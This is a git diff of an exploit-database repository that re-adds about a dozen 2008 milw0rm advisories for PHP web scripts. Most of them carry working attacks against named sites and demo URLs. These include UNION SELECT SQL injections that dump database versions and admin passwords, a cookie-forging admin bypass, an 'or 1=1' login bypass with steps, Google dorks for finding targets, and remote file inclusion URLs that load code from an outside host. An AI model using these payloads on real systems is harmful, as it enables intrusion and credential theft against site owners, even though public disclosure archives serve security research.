-Web.: Starhack.us Oldkral.Com
-email : admin@tr-shark.org
-Exploit:
-
-showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
-
-Demo:
-
-http://www.turnkeyzone.com/demos/software/showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
-
-Greetz: Webloader, Realwolker , Batty , Ceypower , Aranelworm , Nefret , JACKAL , Str0ke
-
-Bunu Da KAbul etmesen ,....
-
-# milw0rm.com [2008-10-31]
+Author : TR-ShaRk
+Web.: Starhack.us Oldkral.Com
+email : admin@tr-shark.org
+Exploit:
+
+showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
+
+Demo:
+
+http://www.turnkeyzone.com/demos/software/showcategory.php?cid=-101+union+select+1,@@version,3,4,5--
+
+Greetz: Webloader, Realwolker , Batty , Ceypower , Aranelworm , Nefret , JACKAL , Str0ke
+
+Bunu Da KAbul etmesen ,....
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6904.txt b/platforms/php/webapps/6904.txt
index c7157b15e..59179db12 100755
--- a/platforms/php/webapps/6904.txt
+++ b/platforms/php/webapps/6904.txt
@@ -1,20 +1,20 @@
--=======================================-
-Autore: x0r
-Cms = Absolute Newsletter 6.1
-Bug: Insecure Cookie Handling Vulnerability
--=======================================-
-
-
-Exploit:
-javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE
-A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to
-/menu.aspx
-
-Live Demo: http://www.xigla.com/absolutenl/demo
-
-[-] King Lion Gay
-[+] Margherita Ti Amo...I'm Sorry...
-
-_EOF_
-
-# milw0rm.com [2008-10-31]
+-=======================================-
+Autore: x0r
+Cms = Absolute Newsletter 6.1
+Bug: Insecure Cookie Handling Vulnerability
+-=======================================-
+
+
+Exploit:
+javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE
+A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to
+/menu.aspx
+
+Live Demo: http://www.xigla.com/absolutenl/demo
+
+[-] King Lion Gay
+[+] Margherita Ti Amo...I'm Sorry...
+
+_EOF_
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6905.txt b/platforms/php/webapps/6905.txt
index 754fcdf4f..b1a6ac843 100755
--- a/platforms/php/webapps/6905.txt
+++ b/platforms/php/webapps/6905.txt
@@ -1,32 +1,32 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
-#
-# Script : SFS Hosting Directory
-# Price: $ 24.95
-# Script Site: http://scripts-for-sites.com/item.php?item=114
-#
-# D0rk : "sie go amk. iÅŸinizmi yok xD"
-#
-# SQL Injection Vuln. :
-#
-# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# Example: http://hostdir.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# -------------------------------
-#                       Ya RAMADHAN
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-#                      Proud 2 Be ALBANIAN !
-#
-# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
-#
-# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
-# Demistim rezil edicem sizi ;)
-#
-#######################################################
-
-# milw0rm.com [2008-10-31]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
+#
+# Script : SFS Hosting Directory
+# Price: $ 24.95
+# Script Site: http://scripts-for-sites.com/item.php?item=114
+#
+# D0rk : "sie go amk. iÅŸinizmi yok xD"
+#
+# SQL Injection Vuln. :
+#
+# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# Example: http://hostdir.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# -------------------------------
+#                       Ya RAMADHAN
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+#                      Proud 2 Be ALBANIAN !
+#
+# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
+#
+# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
+# Demistim rezil edicem sizi ;)
+#
+#######################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6906.txt b/platforms/php/webapps/6906.txt
index 95d71a9f0..d1e0cfa3e 100755
--- a/platforms/php/webapps/6906.txt
+++ b/platforms/php/webapps/6906.txt
@@ -1,32 +1,32 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
-#
-# Script :  SFS Gaming Directory
-# Price: $ 24.95
-# Script Site:  http://scripts-for-sites.com/item.php?item=112
-#
-# D0rk : "sie go. amk iÅŸinizmi yok xD"
-#
-# SQL Injection Vuln. :
-#
-# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# Example: http://game.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# -------------------------------
-#                       Ya RAMADHAN
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-#                      Proud 2 Be ALBANIAN !
-#
-# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
-#
-# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
-# Demistim rezil edicem sizi ;)
-#
-#######################################################
-
-# milw0rm.com [2008-10-31]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
+#
+# Script :  SFS Gaming Directory
+# Price: $ 24.95
+# Script Site:  http://scripts-for-sites.com/item.php?item=112
+#
+# D0rk : "sie go. amk iÅŸinizmi yok xD"
+#
+# SQL Injection Vuln. :
+#
+# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# Example: http://game.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# -------------------------------
+#                       Ya RAMADHAN
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+#                      Proud 2 Be ALBANIAN !
+#
+# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
+#
+# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
+# Demistim rezil edicem sizi ;)
+#
+#######################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6907.txt b/platforms/php/webapps/6907.txt
index 21b3c86cf..fbc1ae3d0 100755
--- a/platforms/php/webapps/6907.txt
+++ b/platforms/php/webapps/6907.txt
@@ -1,32 +1,32 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
-#
-# Script : SFS Home Business Directory
-# Price: $ 24.95
-# Script Site: http://scripts-for-sites.com/item.php?item=113
-#
-# D0rk : "sie go. amk iÅŸinizmi yok xD"
-#
-# SQL Injection Vuln. :
-#
-# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# Example: http://homebiz.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# -------------------------------
-#                       Ya RAMADHAN
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-#                      Proud 2 Be ALBANIAN !
-#
-# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
-#
-# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
-# Demistim rezil edicem sizi ;)
-#
-#######################################################
-
-# milw0rm.com [2008-10-31]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
+#
+# Script : SFS Home Business Directory
+# Price: $ 24.95
+# Script Site: http://scripts-for-sites.com/item.php?item=113
+#
+# D0rk : "sie go. amk iÅŸinizmi yok xD"
+#
+# SQL Injection Vuln. :
+#
+# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# Example: http://homebiz.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# -------------------------------
+#                       Ya RAMADHAN
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+#                      Proud 2 Be ALBANIAN !
+#
+# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
+#
+# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
+# Demistim rezil edicem sizi ;)
+#
+#######################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6908.txt b/platforms/php/webapps/6908.txt
index a8fee8b77..cabfd3e1f 100755
--- a/platforms/php/webapps/6908.txt
+++ b/platforms/php/webapps/6908.txt
@@ -1,34 +1,34 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
-# Hack = Empty W0rk ..
-#
-# Script : SFS Link Directory
-# Price: $ 24.95
-# Script Site: http://scripts-for-sites.com/item.php?item=117
-#
-# D0rk : "sie go. amk iÅŸinizmi yok xD"
-# sakalan xD bisuru site var :  inurl:"links.php?ax=list"
-#
-# SQL Injection Vuln. :
-#
-# Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
-#
-# -------------------------------
-#                       Ya RAMADHAN
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-#                      Proud 2 Be ALBANIAN !
-#
-# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
-#
-# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
-# Demistim rezil edicem sizi ;)
-#
-#######################################################
-
-# milw0rm.com [2008-10-31]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
+# Hack = Empty W0rk ..
+#
+# Script : SFS Link Directory
+# Price: $ 24.95
+# Script Site: http://scripts-for-sites.com/item.php?item=117
+#
+# D0rk : "sie go. amk iÅŸinizmi yok xD"
+# sakalan xD bisuru site var :  inurl:"links.php?ax=list"
+#
+# SQL Injection Vuln. :
+#
+# Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
+#
+# -------------------------------
+#                       Ya RAMADHAN
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+#                      Proud 2 Be ALBANIAN !
+#
+# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
+#
+# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
+# Demistim rezil edicem sizi ;)
+#
+#######################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6909.txt b/platforms/php/webapps/6909.txt
index c302c4b3a..fd9a9521a 100755
--- a/platforms/php/webapps/6909.txt
+++ b/platforms/php/webapps/6909.txt
@@ -1,41 +1,41 @@
-|___________________________________________________
-|
-|  Adult Banner Exchange Website (targetid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------   IQ-SecuritY  -------------------
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script  :  http://www.ezonescripts.com/scripts/sls/adultbannerexchange.php
-|
-| DorK  :  inurl:"click.php?hostid="
-|___________________________________________________
-
-
-Exploit:
-
-www.[target].com/Script/click.php?hostid=1&targetid=-1+union+select+1,version(),user(),4,5--
-
-
-
-
-____________________________( Greetz )_________________________________________
-|
-|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|___________________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-10-31]
+|___________________________________________________
+|
+|  Adult Banner Exchange Website (targetid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------   IQ-SecuritY  -------------------
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script  :  http://www.ezonescripts.com/scripts/sls/adultbannerexchange.php
+|
+| DorK  :  inurl:"click.php?hostid="
+|___________________________________________________
+
+
+Exploit:
+
+www.[target].com/Script/click.php?hostid=1&targetid=-1+union+select+1,version(),user(),4,5--
+
+
+
+
+____________________________( Greetz )_________________________________________
+|
+|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|___________________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6910.txt b/platforms/php/webapps/6910.txt
index 7391590c2..f079bcf70 100755
--- a/platforms/php/webapps/6910.txt
+++ b/platforms/php/webapps/6910.txt
@@ -1,45 +1,45 @@
-|___________________________________________________
-|
-|  EZ BIZ PRO  (track.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------   IQ-SecuritY  -------------------
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|
-| script  :  http://www.scripts-for-sites.info/item.php?item=131
-|
-| DorK  :  inurl:"track.php?id="
-|___________________________________________________
-
-
-Exploit
-________
-
-www.[target].com/Script/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
-
-
-Deom
-________
-
-http://www.turnkeyzone.com/demos/directory/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
-
-____________________________( Greetz )_________________________________________
-|
-|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|___________________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-10-31]
+|___________________________________________________
+|
+|  EZ BIZ PRO  (track.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------   IQ-SecuritY  -------------------
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script  :  http://www.scripts-for-sites.info/item.php?item=131
+|
+| DorK  :  inurl:"track.php?id="
+|___________________________________________________
+
+
+Exploit
+________
+
+www.[target].com/Script/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
+
+
+Deom
+________
+
+http://www.turnkeyzone.com/demos/directory/track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
+
+____________________________( Greetz )_________________________________________
+|
+|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|___________________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6911.txt b/platforms/php/webapps/6911.txt
index 05daa7734..c1f6ff64b 100755
--- a/platforms/php/webapps/6911.txt
+++ b/platforms/php/webapps/6911.txt
@@ -1,33 +1,33 @@
-	SFS EZ  Affiliate [cat_id] Remote SQL Injection Vulnerability
-       ===============================================================
-
-
-----------------------------------------------------------------
-Application : SFS EZ  Affiliate
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : d3b4g
-
-email : bl4ckend[at]gmail[dot]come
-
-Site. www.bl4ck3nd.info
-----------------------------------------------------------------
-
-Exploite:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=[sql]
-
-Version Check:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+from+links/*
-
-Demo: http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,concat_ws(password,email),4,5,6,7,8,9,10,11,12,13+from+links/*
-----------------------------------------------------------------
-
-
-----------------------------------------------------------------
-Greetz: str0ke,All my friends
-          
------------------------------------------------------------------
-Proud to be a maldivian :))
-=======================
-
-# milw0rm.com [2008-10-31]
+	SFS EZ  Affiliate [cat_id] Remote SQL Injection Vulnerability
+       ===============================================================
+
+
+----------------------------------------------------------------
+Application : SFS EZ  Affiliate
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : d3b4g
+
+email : bl4ckend[at]gmail[dot]come
+
+Site. www.bl4ck3nd.info
+----------------------------------------------------------------
+
+Exploite:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=[sql]
+
+Version Check:http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+from+links/*
+
+Demo: http://www.turnkeyzone.com/demos/affiliate/directory.php?ax=list&sub=3&cat_id=-1+union+all+select+1,2,concat_ws(password,email),4,5,6,7,8,9,10,11,12,13+from+links/*
+----------------------------------------------------------------
+
+
+----------------------------------------------------------------
+Greetz: str0ke,All my friends
+          
+-----------------------------------------------------------------
+Proud to be a maldivian :))
+=======================
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6912.txt b/platforms/php/webapps/6912.txt
index a0e3d1acf..c718e86fa 100755
--- a/platforms/php/webapps/6912.txt
+++ b/platforms/php/webapps/6912.txt
@@ -1,24 +1,24 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
-        /____/                                           
-
-# Discovered by : Hakxer
-# Type Gap : Bybass Login
-# Script : Article Publisher Pro : http://www.phparticlescript.com/
-# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
-##########################################################################
-
-[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
-[~] Exploit 
-[~] In Username Write : admin ' or ' 1=1
-[~] In Password Write any thing Example : Hakxer
-[~] Click Login ..! Now You Are In admin panel
-
-# Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
+        /____/                                           
+
+# Discovered by : Hakxer
+# Type Gap : Bybass Login
+# Script : Article Publisher Pro : http://www.phparticlescript.com/
+# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
+##########################################################################
+
+[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
+[~] Exploit 
+[~] In Username Write : admin ' or ' 1=1
+[~] In Password Write any thing Example : Hakxer
+[~] Click Login ..! Now You Are In admin panel
+
+# Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6913.txt b/platforms/php/webapps/6913.txt
index 289120242..9565d0ed1 100755
--- a/platforms/php/webapps/6913.txt
+++ b/platforms/php/webapps/6913.txt
@@ -1,31 +1,31 @@
-	SFS EZ Webring  [cat] Remote SQL Injection Vulnerability
-       ===============================================================
-
-
-----------------------------------------------------------------
-script : SFS EZ Webring 
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : d3b4g
-
-email : bl4ckend[at]gmail[dot]come
-
-Site. www.bl4ck3nd.info
-----------------------------------------------------------------
-Vuln:/webring/category.php?cat=[sql]
-
-Demo: http://www.turnkeyzone.com/demos/webring/category.php?cat=-1+union+all+select+1,@@version,3,4,5/*
-
-----------------------------------------------------------------
-
-
-----------------------------------------------------------------
-Greetz: str0ke,All my friends
-          
------------------------------------------------------------------
-Proud to be a maldivian :))
-=======================
-
-# milw0rm.com [2008-10-31]
+	SFS EZ Webring  [cat] Remote SQL Injection Vulnerability
+       ===============================================================
+
+
+----------------------------------------------------------------
+script : SFS EZ Webring 
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : d3b4g
+
+email : bl4ckend[at]gmail[dot]come
+
+Site. www.bl4ck3nd.info
+----------------------------------------------------------------
+Vuln:/webring/category.php?cat=[sql]
+
+Demo: http://www.turnkeyzone.com/demos/webring/category.php?cat=-1+union+all+select+1,@@version,3,4,5/*
+
+----------------------------------------------------------------
+
+
+----------------------------------------------------------------
+Greetz: str0ke,All my friends
+          
+-----------------------------------------------------------------
+Proud to be a maldivian :))
+=======================
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6914.txt b/platforms/php/webapps/6914.txt
index c7c460f43..a3de4108d 100755
--- a/platforms/php/webapps/6914.txt
+++ b/platforms/php/webapps/6914.txt
@@ -1,37 +1,37 @@
-	SFS EZ Hot ot Not[viewcomments.php?phid] Remote SQL Injection Vulnerability
-       ===============================================================
-
-
-----------------------------------------------------------------
-script : SFS EZ Hot ot Not 
-
-script  :  http://www.scripts-for-sites.info
-
-Risk : High
-
-----------------------------------------------------------------
-
-Discovered by : d3b4g
-
-email : bl4ckend[at]gmail[dot]come
-
-Site. www.bl4ck3nd.info
-
-----------------------------------------------------------------
-Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*
-
-
-version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
-----------------------------------------------------------------
-
-
-----------------------------------------------------------------
-Greetz: str0ke,,Hotlism.org,All my friends
-          
------------------------------------------------------------------
-Proud to be a maldivian :))
-=======================
-
-----------------------------------------------------------------
-
-# milw0rm.com [2008-10-31]
+	SFS EZ Hot ot Not[viewcomments.php?phid] Remote SQL Injection Vulnerability
+       ===============================================================
+
+
+----------------------------------------------------------------
+script : SFS EZ Hot ot Not 
+
+script  :  http://www.scripts-for-sites.info
+
+Risk : High
+
+----------------------------------------------------------------
+
+Discovered by : d3b4g
+
+email : bl4ckend[at]gmail[dot]come
+
+Site. www.bl4ck3nd.info
+
+----------------------------------------------------------------
+Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*
+
+
+version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
+----------------------------------------------------------------
+
+
+----------------------------------------------------------------
+Greetz: str0ke,,Hotlism.org,All my friends
+          
+-----------------------------------------------------------------
+Proud to be a maldivian :))
+=======================
+
+----------------------------------------------------------------
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6915.txt b/platforms/php/webapps/6915.txt
index 969da2144..583405f81 100755
--- a/platforms/php/webapps/6915.txt
+++ b/platforms/php/webapps/6915.txt
@@ -1,15 +1,15 @@
--=====================================-
-Application : SFS EZ  Software
-Risk : High
-FOund By: x0r
--=====================================-
-
-Exploit: software/software-description.php?id=-5 union all select
-1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-
-Live Demo:
-http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
-
--=EOF=-
-
-# milw0rm.com [2008-10-31]
+-=====================================-
+Application : SFS EZ  Software
+Risk : High
+FOund By: x0r
+-=====================================-
+
+Exploit: software/software-description.php?id=-5 union all select
+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
+
+Live Demo:
+http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
+
+-=EOF=-
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6916.txt b/platforms/php/webapps/6916.txt
index 8408d4539..94ded1110 100755
--- a/platforms/php/webapps/6916.txt
+++ b/platforms/php/webapps/6916.txt
@@ -1,20 +1,20 @@
-**************************************************************************************
-ModernBill .:. Client Billing System - User Login
-ModernBill  <= v4.4.X Remote File Inclusion Vulnerability  and xss by nigh7f411
-http://xc0r3.net/
-plezz go to ttp://xc0r3.net/forums/
-**************************************************************************************
-
-rfi
-http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
-http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
-
-xss
